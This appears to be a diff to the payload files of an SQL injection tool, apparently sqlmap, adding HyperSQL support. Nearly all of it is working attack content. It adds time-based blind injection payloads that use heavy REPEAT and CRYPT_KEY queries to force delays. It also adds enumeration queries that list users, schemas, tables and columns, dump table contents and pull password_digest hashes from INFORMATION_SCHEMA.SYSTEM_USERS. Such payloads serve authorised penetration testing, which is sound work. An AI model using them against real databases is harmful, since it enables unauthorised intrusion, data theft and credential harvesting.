         <stype>5</stype>
         <level>5</level>
         <risk>2</risk>
@@ -3228,6 +3431,47 @@ Formats:
             <dbms>IBM DB2</dbms>
         </details>
     </test>
+	
+	<!-- Untested -->
+    <test>
+        <title>HSQL &gt;= 1.7.2 time-based blind - Parameter replace (heavy query)</title>
+        <stype>5</stype>
+        <level>2</level>
+        <risk>2</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</vector>		
+        <request>
+            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>HSQL</dbms>
+			<dbms_version>&gt;= 1.7.2</dbms_version>
+        </details>
+    </test>
+	
+    <test>
+        <title>HSQL &gt; 2.0 time-based blind - Parameter replace (heavy query)</title>
+        <stype>5</stype>
+        <level>2</level>
+        <risk>2</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END) FROM (VALUES(0)))</vector>		
+        <request>
+            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END) FROM (VALUES(0)))</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>HSQL</dbms>
+			<dbms_version>&gt; 2.0</dbms_version>
+        </details>
+    </test>
     <!-- End of time-based blind tests - Parameter replace -->
 
 
@@ -3389,6 +3633,47 @@ Formats:
             <dbms>Oracle</dbms>
         </details>
     </test>
+
+	<test>
+        <title>HSQL &gt;= 1.7.2 time-based blind - GROUP BY and ORDER BY clauses (heavy query)</title>
+        <stype>5</stype>
+        <level>4</level>
+        <risk>2</risk>
+        <clause>2,3</clause>
+        <where>1</where>
+		<vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (ASCII(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000))) ELSE [RANDNUM]/(SELECT 0 FROM INFORMATION_SCHEMA.SYSTEM_USERS) END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</vector>
+        <request>
+            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (ASCII(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000))) ELSE [RANDNUM]/(SELECT 0 FROM INFORMATION_SCHEMA.SYSTEM_USERS) END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</payload>
+			<comment>--</comment>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>HSQL</dbms>
+            <dbms_version>&gt;= 1.7.2</dbms_version>
+        </details>
+    </test>	
+	
+	<test>
+        <title>HSQL &gt; 2.0 time-based blind - GROUP BY and ORDER BY clauses (heavy query)</title>
+        <stype>5</stype>
+        <level>4</level>
+        <risk>2</risk>
+        <clause>2,3</clause>
+        <where>1</where>
+		<vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (ASCII(REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000))) ELSE [RANDNUM]/(SELECT 0 FROM (VALUES(0))) END) FROM (VALUES(0)))</vector>
+        <request>
+            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (ASCII(REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000))) ELSE [RANDNUM]/(SELECT 0 FROM (VALUES(0))) END) FROM (VALUES(0)))</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>HSQL</dbms>
+            <dbms_version>&gt; 2.0</dbms_version>
+        </details>
+    </test>
     <!-- TODO: if possible, add payload for Microsoft Access -->
     <!-- End of time-based blind tests - GROUP BY and ORDER BY clause -->
 
diff --git a/xml/queries.xml b/xml/queries.xml
index 17a756cbb..6b74dea36 100644
--- a/xml/queries.xml
+++ b/xml/queries.xml
@@ -625,4 +625,71 @@
             <blind query="SELECT tabschema FROM (SELECT DISTINCT(tabschema) FROM sysstat.columns WHERE %s) AS foobar" query2="SELECT DISTINCT(tabname) FROM sysstat.columns WHERE tabschema='%s'" count="SELECT COUNT(DISTINCT(tabschema)) FROM sysstat.columns WHERE %s" count2="SELECT COUNT(DISTINCT(tabname)) FROM sysstat.columns WHERE tabschema='%s'" condition="colname" condition2="tabschema" condition3="tabname"/>
         </search_column>
     </dbms>
+
+   <!-- HSQL (Based on MYSQL)-->
+    <dbms value="HyperSQL">
+        <cast query="CAST(%s AS LONGVARCHAR)"/>
+        <length query="CHAR_LENGTH(%s)"/>
+        <isnull query="IFNULL(%s,' ')"/>
+        <delimiter query=","/>
+        <limit query="LIMIT %d %d"/>
+        <limitregexp query="\s+LIMIT\s+([\d]+)\s*\,\s*([\d]+)" query2="\s+LIMIT\s+([\d]+)"/>
+        <limitgroupstart query="1"/>
+        <limitgroupstop query="2"/>
+        <limitstring query=" LIMIT "/>
+        <order query="ORDER BY %s ASC"/>
+        <count query="COUNT(%s)"/>
+        <comment query="--" query2="/*" query3="//"/>
+        <substring query="SUBSTR((%s),%d,%d)"/>
+        <concatenate query="CONCAT(%s,%s)"/>
+        <case query="(CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
+        <hex query="RAWTOHEX(%s)"/>
+        <inference query="ASCII(SUBSTR((%s),%d,1))>%d"/>
+        <banner query="DATABASE_VERSION()"/>
+        <current_user query="CURRENT_USER"/>
+        <current_db query="DATABASE()"/>
+        <hostname query=""/>
+        <is_dba query="SELECT ADMIN FROM INFORMATION_SCHEMA.SYSTEM_USERS WHERE USER=CURRENT_USER"/>
+        <check_udf/>
+        <users>
+            <inband query="SELECT user FROM INFORMATION_SCHEMA.SYSTEM_USERS"/>
+			<!-- LIMIT is needed at start for v1.7 this gets mangled unless no-cast is used -->
+            <blind query="SELECT LIMIT %d 1 DISTINCT(user) FROM INFORMATION_SCHEMA.SYSTEM_USERS" count="SELECT COUNT(DISTINCT(user)) FROM INFORMATION_SCHEMA.SYSTEM_USERS"/>
+        </users>
+        <passwords>
+			<!-- Passwords only shown in later versions &gt;=2.0  -->
+            <inband query="SELECT user_name,password_digest FROM INFORMATION_SCHEMA.SYSTEM_USERS" condition="user_name"/>
+            <blind query="SELECT LIMIT %d 1 DISTINCT(password_digest) FROM INFORMATION_SCHEMA.SYSTEM_USERS WHERE user_name='%s'" count="SELECT COUNT(DISTINCT(password_digest)) FROM INFORMATION_SCHEMA.SYSTEM_USERS WHERE user_name='%s'"/>
+        </passwords>
+        <privileges/>
+        <roles/>
+        <dbs>
+            <inband query="SELECT table_schem FROM INFORMATION_SCHEMA.SYSTEM_SCHEMAS" />
+            <blind query="SELECT LIMIT %d 1 DISTINCT(table_schem) FROM INFORMATION_SCHEMA.SYSTEM_SCHEMAS" count="SELECT COUNT(table_schem) FROM INFORMATION_SCHEMA.SYSTEM_SCHEMAS"/>
+        </dbs>
+        <tables>
+            <inband query="SELECT table_schem,table_name FROM INFORMATION_SCHEMA.SYSTEM_TABLES" condition="table_schem"/>
+            <blind query="SELECT LIMIT %d 1 table_name FROM INFORMATION_SCHEMA.SYSTEM_TABLES WHERE table_schem='%s' " count="SELECT COUNT(table_name) FROM INFORMATION_SCHEMA.SYSTEM_TABLES WHERE table_schem='%s'"/>
+        </tables>
+        <columns>
+            <inband query="SELECT column_name,type_name FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE table_name='%s' AND table_schem='%s'" condition="column_name"/>
+            <blind query="SELECT column_name FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE table_name='%s' AND table_schem='%s'" query2="SELECT column_type FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND column_name='%s' AND table_schema='%s'" count="SELECT COUNT(column_name) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND table_schema='%s'" condition="column_name"/>
+        </columns>
+        <dump_table>
+            <inband query="SELECT %s FROM %s.%s ORDER BY %s"/>
+            <blind query="SELECT LIMIT %d 1 %s FROM %s.%s ORDER BY %s " count="SELECT COUNT(*) FROM %s.%s"/>
+        </dump_table>
+        <search_db>
+            <inband query="SELECT table_schem FROM INFORMATION_SCHEMA.SYSTEM_SCHEMAS WHERE %s" condition="table_schem"/>
+            <blind query="SELECT DISTINCT(table_schem) FROM INFORMATION_SCHEMA.SYSTEM_SCHEMAS WHERE %s" count="SELECT COUNT(DISTINCT(table_schem)) FROM INFORMATION_SCHEMA.SYSTEM_SCHEMAS WHERE %s" condition="table_schem"/>
+        </search_db>
+        <search_table>
+            <inband query="SELECT table_schem,table_name FROM INFORMATION_SCHEMA.SYSTEM_TABLES WHERE %s" condition="table_name" condition2="table_schem"/>
+            <blind query="SELECT DISTINCT(table_schem) FROM INFORMATION_SCHEMA.SYSTEM_TABLES WHERE %s" count="SELECT COUNT(DISTINCT(table_schem)) FROM INFORMATION_SCHEMA.SYSTEM_TABLES WHERE %s" condition="table_name" condition2="table_schem"/>
+        </search_table>
+        <search_column>
+            <inband query="SELECT table_schem,table_name FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE %s" condition="column_name" condition2="table_schem" condition3="table_name"/>
+            <blind query="SELECT DISTINCT(table_schem) FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE %s"  count="SELECT COUNT(DISTINCT(table_schem)) FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE %s" condition="column_name" condition2="table_schem" condition3="table_name"/>
+        </search_column>
+    </dbms>
 </root>